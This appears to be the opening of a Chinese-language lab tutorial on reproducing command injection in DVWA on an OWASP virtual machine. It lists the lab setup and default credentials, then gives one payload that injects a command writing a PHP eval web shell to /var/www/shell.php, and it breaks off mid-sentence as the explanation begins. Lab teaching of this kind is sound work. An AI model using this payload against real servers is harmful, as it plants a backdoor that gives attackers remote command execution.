这篇文章旨在用于网络安全学习,请勿进行任何非法行为,否则后果自负。
准备环境
- OWASP虚拟机
- xfp 7与xshell 7
- DVWA系统默认的账号密码均为:admin/admin
1、命令注入中复现
攻击payload
127.0.0.1 | echo "<?php @eval(\$_POST[\"cmd\"])?>" > /var/www/shell.php
这个命令的目的是在服务器上创建一个名为 shell.php
的文件,其中包含 PHP 代码。让我们逐步分析该命令:</